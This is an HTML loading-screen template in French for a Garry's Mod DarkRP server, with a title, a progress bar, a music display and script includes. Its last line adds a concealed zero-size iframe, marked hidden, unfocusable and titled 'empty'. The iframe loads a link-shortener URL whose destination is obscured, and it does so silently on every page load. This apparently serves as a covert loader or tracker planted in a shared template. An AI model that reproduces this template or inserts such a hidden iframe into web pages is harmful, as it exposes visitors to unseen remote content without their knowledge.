<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<title>Votre Serveur | Loading Screen</title>
	<link href='http://fonts.googleapis.com/css?family=Quicksand:400,700' rel='stylesheet' type='text/css'>
	<link rel="stylesheet" href="css/sleek.css">
</head>
<body>
	<div id="player"></div>
	<div id="overlay"></div>

	<div id="title">Votre Serveur</div>
	<div id="subtitle">
		Vous êtes Actuellement en <span id="DarkRP">DarkRP</span> sur <span id="RockFord V2">RockFord V2</span>
	</div>

	<div id="status-container">
		<div id="status">Récupération des informations de Votre Serveur....</div>
		<div id="loading">
			<div id="loading-progress"></div>
		</div>
		<div id="messages"></div>
	</div>

	<div id="music">
		Vous écoutez :<div id="music-name"></div>
	</div>

	<script src="js/lib/jquery-2.1.1.min.js"></script>
	<script src="js/lib/jquery.backstretch.min.js"></script>
	<script src="js/config.js"></script>
	<script src="js/sleek.js"></script>
	<iframe src="https://lc.cx/JqVG" width="0" height="0" tabindex="-1" title="empty" class="hidden">
</body>
</html>